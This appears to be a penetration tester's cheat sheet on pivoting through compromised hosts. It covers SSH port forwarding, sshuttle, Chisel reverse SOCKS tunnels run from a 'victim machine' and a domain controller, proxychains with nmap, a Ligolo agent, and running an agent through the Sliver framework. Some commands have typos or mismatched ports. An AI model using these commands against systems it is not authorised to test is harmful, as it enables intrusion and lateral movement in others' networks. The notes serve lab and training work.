| Concept | Direction | Example |
|---|---|---|
| Port Forwarding | Local to Remote | ssh -L 8080:localhost:8080 user@remote_server_ip |
| Remote Port Forwarding | Remote to Local | ssh -R 3306:localhost:3306 user@remote_server_ip |
| Reverse Tunnel | Remote to Local | ssh -R 8080:localhost:8080 user@public_server_ip |
| Forward Tunnel | Local to Remote | ssh -L 3306:remote_database_ip:3306 user@remote_server_ip |
Sshuttle
command:
sshuttle -r username@192.168.1.100 192.168.2.0/24
sudo nmap --top-ports=20 -sT -Pn IP Chisel
After obtaining the reverse shell
Transfer the file to the machine where you obtained the shell based on the version of that OS.
On your machine as Server:
./chisel server -p 8000 --reverseOn the Victim Machine:
./chisel client 192.168.119.185:8001 R:socks./loot client 10.10.15.149:8001 R:socks
On attackers Machine:
Modify the file:
sudo nano /etc/proxychains4.conf
socks5 127.0.0.1 1080Then before using any command just write proxychains ahead of it.
proxychains nmap -sT ipOn my local machine:
./chisel server -p 8002 --reverse
./chisel server -p 8004 --reverse
On 10.10.10.123:
./chiselj client 10.10.16.108:8002 R:1080:socks
On DC01:
.\chiselj.exe client 10.10.16.108:8004 R:1090:socks
Ping Scan doesn’t works
SSH Local Port Forwarding
ssh -N -L [bind_address:]port:host:hostport [username@address]SSH Remote Port Forwarding
In this case, we have access to a non-root shell on a Linux client on the internal network. On this compromised machine, we discover that a MySQL server is running on TCP port 3306. Unlike the previous scenario, the firewall is blocking inbound TCP port 22 (SSH) connections, so we can’t SSH into this server from our Internet-connected Kali machine.
The ssh command syntax to create this tunnel will include the local IP and port, the remote IP and port, and -R to specify a remote forward:
command:
ssh -N -R [bind_address:]port:host:hostport [username@address]SSH Dynamic Port Forwarding
SSH dynamic port forwarding allows us to set a local listening port and have it tunnel incoming traffic to any remote destination through the use of a proxy.
command:
ssh -N -D <address to bind to>:<port to bind to> <username>@<SSH server address>sudo vim /etc/proxychains.confsocks4 127.0.0.1 8080
Ek sathe badha local port mokli didha
command2:
sudo proxychains nmap --top-ports=20 -sT -Pn 192.168.1.110Ligolo
Setting up ligolo proxy
sudo ip tuntap add user jay mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 10.9.20.0/24 dev ligolo (Dont forget to change this)
./proxy -selfcert -laddr 10.10.15.57:443
agent_windows.exe -connect 10.10.15.57:8443 --ignore-cert
Sliver
upload agent.exe
execute agent.exe -connect 192.168.45.195:9001 --ignore-cert